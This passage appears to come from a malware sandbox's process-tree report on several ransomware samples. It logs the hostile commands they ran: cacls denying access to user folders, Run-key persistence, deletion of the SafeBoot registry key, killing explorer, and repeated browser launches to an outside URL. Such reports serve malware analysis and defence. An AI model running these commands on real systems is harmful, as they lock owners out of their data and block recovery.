C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Encoder.nbm-ea97137ea1a041c3c00da972b49da8e709b2e66470fbbfd00387745d0e29b365.exeTrojan-Ransom.Win32.Encoder.nbm-ea97137ea1a041c3c00da972b49da8e709b2e66470fbbfd00387745d0e29b365.exe3⤵PID:6192
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A07C.tmp\A07D.tmp\A07E.bat C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Encoder.nbm-ea97137ea1a041c3c00da972b49da8e709b2e66470fbbfd00387745d0e29b365.exe"4⤵PID:300
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wtry /f5⤵
- Modifies registry key
PID:5736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:5332
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Music\*.*" /e /d everyone5⤵PID:8340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:7704
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Downloads\*.*" /e /d everyone5⤵PID:10168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:3444
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Links\*.*" /e /d everyone5⤵PID:6356
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:9816
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Favorites\*.*" /e /d everyone5⤵PID:1444
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:7712
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Documents\*.*" /e /d everyone5⤵PID:1096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:8024
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Videos\*.*" /e /d everyone5⤵PID:10120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:6864
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Pictures\*.*" /e /d everyone5⤵PID:6724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"5⤵PID:5764
-
-
C:\Windows\system32\cacls.execacls "C:\Users\Admin\Desktop\*.*" /e /d everyone5⤵PID:6832
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe5⤵
- Kills process with taskkill
PID:5200
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:8732
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "mstray" /t REG_SZ /d "C:\Windows\system32\mstray.exe" /f5⤵PID:9224
-
-
C:\Windows\system32\mstray.exeC:\Windows\system32\mstray.exe5⤵PID:8448
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91A2.tmp\91A3.tmp\91A4.bat C:\Windows\system32\mstray.exe"6⤵PID:9260
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7068
-
-
C:\Windows\system32\cmd.exePID:7688
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7196
-
-
C:\Windows\system32\find.exePID:904
-
-
-
C:\LZYVirus\@[email protected]PID:9476
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:9788
-
-
C:\Windows\system32\cmd.exePID:8488
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7520
-
-
C:\Windows\system32\find.exePID:7044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:8956
-
-
C:\Windows\system32\cmd.exePID:1368
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:3480
-
-
C:\Windows\system32\find.exePID:4120
-
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:1728
-
-
C:\Windows\system32\cmd.exePID:9460
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7284
-
-
C:\Windows\system32\find.exePID:9756
-
-
-
C:\LZYVirus\@[email protected]PID:804
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:520
-
-
C:\Windows\system32\cmd.exePID:2884
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8656
-
-
C:\Windows\system32\find.exePID:6344
-
-
-
C:\LZYVirus\@[email protected]PID:8780
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5764
-
-
C:\Windows\system32\cmd.exePID:9284
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8088
-
-
C:\Windows\system32\find.exePID:5316
-
-
-
C:\LZYVirus\@[email protected]PID:7268
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:8364
-
-
C:\Windows\system32\cmd.exePID:7316
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6540
-
-
C:\Windows\system32\find.exePID:7036
-
-
-
C:\LZYVirus\@[email protected]PID:7480
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6376
-
-
C:\Windows\system32\cmd.exePID:8012
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6944
-
-
C:\Windows\system32\find.exePID:7868
-
-
-
C:\LZYVirus\@[email protected]PID:9624
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7960
-
-
C:\Windows\system32\cmd.exePID:4100
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:4228
-
-
C:\Windows\system32\find.exePID:3644
-
-
-
C:\LZYVirus\@[email protected]PID:4004
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3460
-
-
C:\Windows\system32\cmd.exePID:9864
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6660
-
-
C:\Windows\system32\find.exePID:4748
-
-
-
C:\LZYVirus\@[email protected]PID:7536
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:8124
-
-
C:\Windows\system32\cmd.exePID:9100
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7072
-
-
C:\Windows\system32\find.exePID:4620
-
-
-
C:\LZYVirus\@[email protected]PID:5292
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2916
-
-
C:\Windows\system32\cmd.exePID:6088
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:1852
-
-
C:\Windows\system32\find.exePID:8904
-
-
-
C:\LZYVirus\@[email protected]PID:8856
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5488
-
-
C:\Windows\system32\cmd.exePID:2920
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8944
-
-
C:\Windows\system32\find.exePID:964
-
-
-
C:\LZYVirus\@[email protected]PID:1112
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2448
-
-
C:\Windows\system32\cmd.exePID:10236
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:9948
-
-
C:\Windows\system32\find.exePID:4080
-
-
-
C:\LZYVirus\@[email protected]PID:1816
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:9452
-
-
C:\Windows\system32\cmd.exePID:3988
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:1180
-
-
C:\Windows\system32\find.exePID:4340
-
-
-
C:\LZYVirus\@[email protected]PID:3192
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4536
-
-
C:\Windows\system32\cmd.exePID:9508
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8580
-
-
C:\Windows\system32\find.exePID:6360
-
-
-
C:\LZYVirus\@[email protected]PID:2816
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2964
-
-
C:\Windows\system32\cmd.exePID:5096
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:9132
-
-
C:\Windows\system32\find.exePID:9824
-
-
-
C:\LZYVirus\@[email protected]PID:8520
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:10140
-
-
C:\Windows\system32\cmd.exePID:8620
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6808
-
-
C:\Windows\system32\find.exePID:6768
-
-
-
C:\LZYVirus\@[email protected]PID:8532
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:8592
-
-
C:\Windows\system32\cmd.exePID:6452
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7720
-
-
C:\Windows\system32\find.exePID:5572
-
-
-
C:\LZYVirus\@[email protected]PID:9288
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5868
-
-
C:\Windows\system32\cmd.exePID:4852
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5856
-
-
C:\Windows\system32\find.exePID:9788
-
-
-
C:\LZYVirus\@[email protected]PID:6676
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7152
-
-
C:\Windows\system32\cmd.exePID:8300
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:9752
-
-
C:\Windows\system32\find.exePID:7984
-
-
-
C:\LZYVirus\@[email protected]PID:5356
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3880
-
-
C:\Windows\system32\cmd.exePID:5984
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6652
-
-
C:\Windows\system32\find.exePID:6052
-
-
-
C:\LZYVirus\@[email protected]PID:436
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4684
-
-
C:\Windows\system32\cmd.exePID:2288
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:3544
-
-
C:\Windows\system32\find.exePID:1736
-
-
-
C:\LZYVirus\@[email protected]PID:408
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4532
-
-
C:\Windows\system32\cmd.exePID:7012
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:6736
-
-
C:\Windows\system32\find.exePID:5904
-
-
-
C:\LZYVirus\@[email protected]PID:8744
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7964
-
-
C:\Windows\system32\cmd.exePID:7292
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:4028
-
-
C:\Windows\system32\find.exePID:5156
-
-
-
C:\LZYVirus\@[email protected]PID:6444
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:1356
-
-
C:\Windows\system32\cmd.exePID:3668
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:9652
-
-
C:\Windows\system32\find.exePID:1508
-
-
-
C:\LZYVirus\@[email protected]PID:3444
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6356
-
-
C:\Windows\system32\cmd.exePID:5712
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:2528
-
-
C:\Windows\system32\find.exePID:9816
-
-
-
C:\LZYVirus\@[email protected]PID:6212
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:1128
-
-
C:\Windows\system32\cmd.exePID:5420
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:2328
-
-
C:\Windows\system32\find.exePID:6988
-
-
-
C:\LZYVirus\@[email protected]PID:4512
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5620
-
-
C:\Windows\system32\cmd.exePID:9712
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:2084
-
-
C:\Windows\system32\find.exePID:3296
-
-
-
C:\LZYVirus\@[email protected]PID:7392
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6536
-
-
C:\Windows\system32\cmd.exePID:4560
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8028
-
-
C:\Windows\system32\find.exePID:7184
-
-
-
C:\LZYVirus\@[email protected]PID:9524
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3932
-
-
C:\Windows\system32\cmd.exePID:5968
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:4988
-
-
C:\Windows\system32\find.exePID:7048
-
-
-
C:\LZYVirus\@[email protected]PID:3688
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3708
-
-
C:\Windows\system32\cmd.exePID:3552
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:3768
-
-
C:\Windows\system32\find.exePID:3616
-
-
-
C:\LZYVirus\@[email protected]PID:3476
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6720
-
-
C:\Windows\system32\cmd.exePID:6300
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:4116
-
-
C:\Windows\system32\find.exePID:2484
-
-
-
C:\LZYVirus\@[email protected]PID:3164
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3524
-
-
C:\Windows\system32\cmd.exePID:8772
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8472
-
-
C:\Windows\system32\find.exePID:6100
-
-
-
C:\LZYVirus\@[email protected]PID:6656
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5540
-
-
C:\Windows\system32\cmd.exePID:5672
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7452
-
-
C:\Windows\system32\find.exePID:10204
-
-
-
C:\LZYVirus\@[email protected]PID:3724
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3992
-
-
C:\Windows\system32\cmd.exePID:6368
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5460
-
-
C:\Windows\system32\find.exePID:9744
-
-
-
C:\LZYVirus\@[email protected]PID:4280
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6168
-
-
C:\Windows\system32\cmd.exePID:1560
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7588
-
-
C:\Windows\system32\find.exePID:5676
-
-
-
C:\LZYVirus\@[email protected]PID:660
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5444
-
-
C:\Windows\system32\cmd.exePID:6924
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:3000
-
-
C:\Windows\system32\find.exePID:3876
-
-
-
C:\LZYVirus\@[email protected]PID:5940
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5352
-
-
C:\Windows\system32\cmd.exePID:8660
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:8184
-
-
C:\Windows\system32\find.exePID:9696
-
-
-
C:\LZYVirus\@[email protected]PID:7192
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:9232
-
-
C:\Windows\system32\cmd.exePID:7332
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:2380
-
-
C:\Windows\system32\find.exePID:7748
-
-
-
C:\LZYVirus\@[email protected]PID:9060
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2764
-
-
C:\Windows\system32\cmd.exePID:5964
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:2760
-
-
C:\Windows\system32\find.exePID:5364
-
-
-
C:\LZYVirus\@[email protected]PID:2936
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:1584
-
-
C:\Windows\system32\cmd.exePID:4220
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:3280
-
-
C:\Windows\system32\find.exePID:8700
-
-
-
C:\LZYVirus\@[email protected]PID:4724
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:8360
-
-
C:\Windows\system32\cmd.exePID:9648
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:1792
-
-
C:\Windows\system32\find.exePID:7320
-
-
-
C:\LZYVirus\@[email protected]PID:2468
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2344
-
-
C:\Windows\system32\cmd.exePID:3840
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7008
-
-
C:\Windows\system32\find.exePID:8948
-
-
-
C:\LZYVirus\@[email protected]PID:9512
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7700
-
-
C:\Windows\system32\cmd.exePID:7100
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:7620
-
-
C:\Windows\system32\find.exePID:6816
-
-
-
C:\LZYVirus\@[email protected]PID:9600
-
-
C:\Windows\system32\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:684
-
-
C:\Windows\system32\cmd.exePID:9120
-
-
-
-
-
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Encoder.ncc-aaccb208c97c30e487589faa4e32b5178c10c732ca17dc14c57c43312f8e3831.exeTrojan-Ransom.Win32.Encoder.ncc-aaccb208c97c30e487589faa4e32b5178c10c732ca17dc14c57c43312f8e3831.exe3⤵PID:9020
-
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.GenericCryptor.cys-b059843eba05481808a1fe0f315d5d90f6280ed1d9c2ca23248bd5b502a87e9b.exeTrojan-Ransom.Win32.GenericCryptor.cys-b059843eba05481808a1fe0f315d5d90f6280ed1d9c2ca23248bd5b502a87e9b.exe3⤵PID:8016
-
C:\Users\Admin\AppData\Local\Temp\qoiss.exe"C:\Users\Admin\AppData\Local\Temp\qoiss.exe"4⤵PID:8276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "4⤵PID:4572
-
-
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Mbro.bcfn-23cb967e1c525f359e50a52dbecef86ca87ac8d33192c7a314011511bb2a681b.exeTrojan-Ransom.Win32.Mbro.bcfn-23cb967e1c525f359e50a52dbecef86ca87ac8d33192c7a314011511bb2a681b.exe3⤵PID:5532
-
C:\Windows\SysWOW64\REG.exeREG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\ /va /f4⤵
- Modifies registry key
PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:10164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:6708
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:8400
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:9160
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:9904
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:8996
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:4628
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:7832
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:8628
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:6200
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:7128
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0xdc,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:4912
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:8260
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:7252
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:7792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe585347185⤵PID:7204
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=4⤵PID:3924
-
